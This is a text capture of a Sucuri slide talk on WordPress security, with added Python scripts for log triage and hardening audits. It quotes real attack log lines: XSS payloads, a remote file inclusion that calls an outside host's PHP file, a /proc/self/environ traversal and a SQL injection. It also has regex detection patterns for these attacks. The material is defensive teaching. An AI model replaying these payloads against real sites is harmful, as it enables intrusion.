Post on 23-Aug-2014
It’s About the Basics: Website Security (WordPress)
04/07/2023
# WHOIS PEREZBOX
Organization: Sucuri, Inc., Co-Founder and Chief Operating Officer (@sucuri_security, @perezbox)
Specialization: Website Security, Incident Handling, Log Analysis
Special Interests: Working Out, Brazilian Jiu-Jitsu
Tony Perez | @perezbox | @sucuri_security 2
Website Security Company
- Global Operations
- Platform Agnostic (e.g., Joomla, WordPress, etc.)
- Scan 2M Unique Domains a Month
- Block 4M web attacks a Month
- Remediate 400 – 500 websites a day
- Signature / Heuristic Based
- 24/7 operations
Today’s Discussion: Trends, Threats, Defenses
SIMPLE RIGHT?
Trends
2013 – Year of the Mega Breach
[Chart: Data Breaches (Millions), 2011 vs 2013: ~230%]
Anatomy of Malicious Websites
[Chart: Malicious Websites vs Legitimate Websites: 85%]
Legitimate Websites
[Chart: Exploitable vs Not-Exploitable: 77%]
1 in 8 - Critical Vulnerability
Malware Distribution
[Chart: Remote iFrame Includes, Remote JavaScript Includes, SPAM Injections, Obfuscated / Encoded JavaScript, Conditional Redirects, Defacements, Other; values shown: 26%, 19%, 16%, 14%, 11%, 4%, 10%]
Malicious Links
[Diagram: sources of malicious links: Social Media, Email Links, Website, Text Messages]
Spear Phishing / Phishing Increase: 93% Increase in 2013
Beyond The Application Layer
- Darkleech
- Cdork (Apache)
- Ebury (SSH)
- Email Server (SPAM)
- Heartbleed (OpenSSL)
Going deeper than the application layer, targeting the server.
Server Polymorphism – a.k.a. highly adaptive / sophisticated
HeartBleed
Search Engine Poisoning (SEP): Pharmacy, Payday Loans
Automated Attacks
[Diagram: WP-ADMIN, Themes / Plugins, Payload]
Exploiting Access Control
Soup Kitchen Servers
[Diagram: Site 1, Site 2, Site 3, Site 4 sharing one server: Cross-Site Contamination]
Drive By Downloads
Targeting Zero Days
Targeting Mobile Devices
Google is On Fire
Brute Force Attacks
Denial of Service (DoS)
Brute Force vs Denial of Service
Exploiting Trust
There’s a Tool for That
- Explosion in the Malware as a Service (MaaS) trade: yes, pay someone to hack for you
- Different tools to break in and generate payloads: brute force and vulnerability exploits, malware payloads
- Blackhole Exploit Kit author arrested
Exploit Kit Market in Flux
[Chart: Neutrino, Unknown Kit, Redkit, SweetOrange, Styx, Glazunov/Sibhost, Nuclear, Blackhole/Cool, Other; values shown: 25%, 22%, 9%, 1%, 10%, 5%, 11%, 10%, 5%]
Don’t Worry, Everyone is a “Target”
Threats
Anatomy of Web Attacks
[Diagram: Recon -> Identify -> Attack -> Decisions -> Sustain]
What kind of website do you have?
Use for malware? Burrow into network? Steal data?
Five Stages of an Attack
Cross-Site Scripting (XSS)
38.123.140.6 - - [18/Feb/2013:18:23:23 -0500] "GET /cgi-bin/viewcvs.cgi/?cvsroot=<script>foo</script> HTTP/1.1" 302 227 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
123.151.39.41 - - [18/Mar/2013:16:20:12 -0400] "GET /art/all/animals/%3C%2Fscript%3E%3Cimg+src%3D%40+onerror%3Dalert%287872%29+%2F%3E HTTP/1.1" 404 268
Types: Stored | Reflective
iFrame Injections
Remote / Local File Inclusion (RFI / LFI)
[02/Apr/2013:00:32:58 -0400] "GET /results/wp-content/themes/Convertible/timthumb.php?src=http%3A%2F%2Fflickr.easyneffective.com%2Fcrotz.php HTTP/1.1" 200 11983 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
83.170.99.221 - - [03/Apr/2013:13:03:16 -0400] "GET /results/chinchedbistro.com&sa=U&ei=vGBcUYS1IcOaiQLxu4HIBg&ved=0CCYQFjAE&usg=AFQjCNFN1APEnX9-WPS337kMyPUz0yDM8A/wp-content/themes/vulcan/lib/scripts/thumb.php?src=http://wordpress.com.4creatus.com/info.php HTTP/1.1" 200 11983 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
82.98.131.101 - - [03/Apr/2013:12:59:56 -0400] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ%0000 HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
SQL Injection
62.122.71.181 - - [03/Apr/2013:05:24:22 -0400] "GET //?malware-999.9+union+select+0-- HTTP/1.1" 200 26336 "-" "Mozilla/5.0 (Windows NT;en-us) Firefox/3.5.9"
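As an added example (not from the slides or Sucuri), a small Python log-triage script that parses Apache-format access-log lines like the ones on the XSS, file inclusion and SQL injection slides, percent-decodes the request target so encoded payloads become visible, and tags each request with the attack class it resembles. The sample lines are abridged copies of the slide's entries plus one constructed benign request (10.0.0.5); the rules are illustrative indicators, not a production signature set.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample: abridged copies of the slide's log lines plus one benign request (10.0.0.5).
SAMPLE_LOG = r'''
38.123.140.6 - - [18/Feb/2013:18:23:23 -0500] "GET /cgi-bin/viewcvs.cgi/?cvsroot=<script>foo</script> HTTP/1.1" 302 227 "-" "Mozilla/4.0"
123.151.39.41 - - [18/Mar/2013:16:20:12 -0400] "GET /art/all/animals/%3C%2Fscript%3E%3Cimg+src%3D%40+onerror%3Dalert%287872%29+%2F%3E HTTP/1.1" 404 268
83.170.99.221 - - [03/Apr/2013:13:03:16 -0400] "GET /wp-content/themes/vulcan/lib/scripts/thumb.php?src=http://wordpress.com.4creatus.com/info.php HTTP/1.1" 200 11983 "-" "Mozilla/5.0"
82.98.131.101 - - [03/Apr/2013:12:59:56 -0400] "GET /?option=com_ckforms&controller=../../../../../../proc/self/environ%0000 HTTP/1.1" 302 - "-" "Mozilla/5.0"
62.122.71.181 - - [03/Apr/2013:05:24:22 -0400] "GET //?malware-999.9+union+select+0-- HTTP/1.1" 200 26336 "-" "Mozilla/5.0"
10.0.0.5 - - [03/Apr/2013:05:25:00 -0400] "GET /index.php?option=com_content&view=article&id=12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
'''

# Apache common/combined format: client IP, timestamp, request line, status. Lines that do not parse are skipped.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3}|-)')

# Indicators for the four attack classes on the slides, matched against the percent-decoded request target.
RULES = [
    ("xss",  re.compile(r"<\s*/?\s*script|\bon[a-z]+\s*=|javascript:", re.I)),
    ("sqli", re.compile(r"\bunion\b[\s/*]+(?:all\s+)?select\b|\bor\s+1\s*=\s*1\b", re.I)),
    ("lfi",  re.compile(r"(?:\.\./){2,}|/proc/self/environ|\x00", re.I)),
    ("rfi",  re.compile(r"[?&]\w+=(?:https?|ftp)://", re.I)),
]

def parse_line(line):
    """Return the fields of one log line (plus a decoded target) or None if it is not a request line."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec["decoded"] = unquote_plus(rec["target"])  # decode %XX and '+' so obfuscated payloads are visible
    return rec

def classify(decoded_target):
    """Return the names of the rules that fire on a decoded request target (empty for benign traffic)."""
    return [name for name, rx in RULES if rx.search(decoded_target)]

def scan_log(text):
    """Return (ip, categories, status) for every request in the log that matches at least one rule."""
    hits = []
    for line in text.strip().splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        cats = classify(rec["decoded"])
        if cats:
            hits.append((rec["ip"], cats, rec["status"]))
    return hits

if __name__ == "__main__":
    for ip, cats, status in scan_log(SAMPLE_LOG):
        print(f"{ip:15} {status} {','.join(cats)}")
```

The status column matters for triage: a 200 on a thumb.php?src=http://... request means the include likely succeeded, while the 404 on the second XSS line shows a probe that never reached a handler.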
Spear Phishing
Backdoors
Free is not always Free
http://blog.sucuri.net/2014/03/unmasking-free-premium-wordpress-plugins.html
- SEOPressor. Payload located: wp-content/plugins/seo-pressor(gratuit). File: central.class.php
- Flat Skins Pack Extension. Payload located: wp-content/restrict-content-pro/includes/. File: sidebar.php
- Restrict Content Pro. Payload located: wp-content/ubermenu-skins-flat
What’s all this mean?
- Brand Reputation
- Legal Implications
- Impact to Sales
- Blacklisted by Search Engines
- Blacklisted by Payment Processors
- Worst Day of Your Life
Defenses
Our Insights Come From
- Sucuri properties suffer ~125,000 web-based attacks a month on average
- ~4,000 attacks a day; this spikes on occasion
- Doesn’t include server-level attacks
- All flavors of attacks
Areas to Focus On: Principles, Access Control, Vulnerabilities
Manage your expectations
“It’s about risk reduction… risk will never be zero…”
Defense in Depth
“…a concept in which multiple layers of security controls (defenses) are placed throughout an information technology (IT) system. Its intent is to provide redundancy in the event a security control fails or a vulnerability is exploited…”
Access: Passwords
Complex – Long – Unique
Principle of Least Privilege
“requires that in a particular abstraction layer of a computing environment, every module (such as a process, a user or a program depending on the subject) must be able to access only the information and resources that are necessary for its legitimate purpose.”
Disable PHP Execution
PHP execution, disable it in: /wp-includes /wp-content /themes /plugins /uploads
Apache rule:
<Files *.php>
Deny from all
</Files>
Disable Plugin / Theme Editor: wp-config.php modification
# Disable Plugin / Theme Editor
define('DISALLOW_FILE_EDIT', true);
Please Backup
Stay Current (Update)
NOT THAT HARD!!!!
Software Vulnerabilities
Biggest Weakness / Vulnerability
Simple Steps to Risk Reduction
The Bare Minimum:
1. Connect Securely – SFTP / SSH
2. Authentication Keys / wp-config
3. Use Trusted Sources
4. Use a local Antivirus – MAC too
5. Permissions - D 755 | F 644
6. Least Privilege Principles
7. Accountability
8. Backups – Include Database
Ideal implementations:
1. Employ Website Firewall
2. Don’t let WordPress write to itself
3. Filter Access by IP
4. Use a dedicated server / VPS
5. Monitor all Activity (Logging)
6. Enable SSL for transactions
7. Keep environment current (patched)
8. No Soup Kitchen Servers
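As an added example (not from the slides or Sucuri), a Python audit that checks a WordPress tree for the controls on the preceding slides: DISALLOW_FILE_EDIT in wp-config.php, the <Files *.php> deny rule in wp-includes and uploads, the "D 755 | F 644" permissions, nothing world-writable, and (an addition not on the slides) no PHP files under uploads. The two sample trees are constructed; snapshot() walks a real install at a path you supply.

```python
import os, re, stat

# Checks from the Defenses slides: DISALLOW_FILE_EDIT, PHP denied in wp-includes/uploads, D 755 | F 644, nothing world-writable.
NO_EXEC_DIRS = ("wp-includes", "wp-content/uploads")
FILE_EDIT_RE = re.compile(r"define\(\s*['\"]DISALLOW_FILE_EDIT['\"]\s*,\s*true\s*\)", re.I)
DENY_PHP_RE = re.compile(r"<Files\s+\*\.php>.*?Deny from all.*?</Files>", re.I | re.S)

def snapshot(root):
    """Walk a real install into {relative_path: (is_dir, mode, text)}; text is read only for wp-config.php and .htaccess."""
    tree = {}
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            full = os.path.join(dirpath, name)
            st = os.lstat(full)
            text = None
            if name in ("wp-config.php", ".htaccess") and stat.S_ISREG(st.st_mode):
                with open(full, errors="replace") as fh:
                    text = fh.read()
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            tree[rel] = (stat.S_ISDIR(st.st_mode), stat.S_IMODE(st.st_mode), text)
    return tree

def audit(tree):
    """Return the list of hardening findings for a tree from snapshot() (empty when every check passes)."""
    findings = []
    cfg = tree.get("wp-config.php")
    if cfg is None or not FILE_EDIT_RE.search(cfg[2] or ""):
        findings.append("wp-config.php: DISALLOW_FILE_EDIT is not set to true")
    for d in NO_EXEC_DIRS:
        ht = tree.get(d + "/.htaccess")
        if ht is None or not DENY_PHP_RE.search(ht[2] or ""):
            findings.append(f"{d}/.htaccess: direct PHP execution is not denied")
    for rel, (is_dir, mode, _) in sorted(tree.items()):
        if not is_dir and rel.startswith("wp-content/uploads/") and rel.endswith(".php"):
            findings.append(f"{rel}: PHP file inside uploads")  # uploads should hold media, never code
        if mode & 0o002:
            findings.append(f"{rel}: world-writable ({mode:o})")
        elif mode != (0o755 if is_dir else 0o644):
            findings.append(f"{rel}: mode {mode:o}, expected {'755' if is_dir else '644'}")
    return findings

# Constructed sample trees (not a real install): one following the slides, one with the common mistakes.
DENY = "<Files *.php>\nDeny from all\n</Files>\n"
HARDENED = {"wp-config.php": (False, 0o644, "<?php\ndefine('DISALLOW_FILE_EDIT', true);\n"),
            "wp-includes": (True, 0o755, None), "wp-includes/.htaccess": (False, 0o644, DENY),
            "wp-content": (True, 0o755, None), "wp-content/uploads": (True, 0o755, None),
            "wp-content/uploads/.htaccess": (False, 0o644, DENY)}
SLOPPY = {"wp-config.php": (False, 0o666, "<?php\n"), "wp-includes": (True, 0o755, None),
          "wp-content": (True, 0o777, None), "wp-content/uploads": (True, 0o755, None),
          "wp-content/uploads/x.php": (False, 0o644, None)}
```

Run `audit(snapshot("/path/to/wordpress"))` against a live tree; note that the <Files> rule only blocks direct HTTP requests for .php files, code that WordPress itself includes is unaffected, which is why a stray .php under uploads is still reported.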
10 Stupid Mindsets / Actions
1. Fix index.php file and assume all is fine.
2. Panic your way into WordPress Forums after hack.
3. Don’t worry about updating.
4. Trust third-party extensions.
5. Apply all upgrades on live site.
6. Install and forget, all is well with your new site.
7. Use the same username and password for everything.
8. Don’t waste time making security adjustments to PHP and settings.
9. No regular backups required.
10. Use the cheapest host.
Notable Resources
Sucuri Blog: http://blog.sucuri.net
Sucuri TV: http://sucuri.tv
Malware Scanner: http://sitecheck.sucuri.net
Malware Scanner: http://unmaskparasites.com
Badware Busters: https://badwarebusters.org
Google Forums: http://productforums.google.com/forum/#!categories/webmasters/malware--hacked-sites
Google Webmaster Tools: http://support.google.com/webmasters/bin/answer.py?hl=en&answer=163633
Secunia Security Advisories: http://secunia.com/community/advisories/search/?search=wordpress
Exploit-DB: http://www.exploit-db.com/search/?action=search&filter_description=Wordpress&filter_platform=31
WordPress Hacked FAQ: http://codex.wordpress.org/FAQ_My_site_was_hacked
WordPress Hardening: http://codex.wordpress.org/Hardening_WordPress
Questions?
Tony Perez, Sucuri, Inc.
http://sucuri.net | http://blog.sucuri.net
@perezbox | @sucuri_security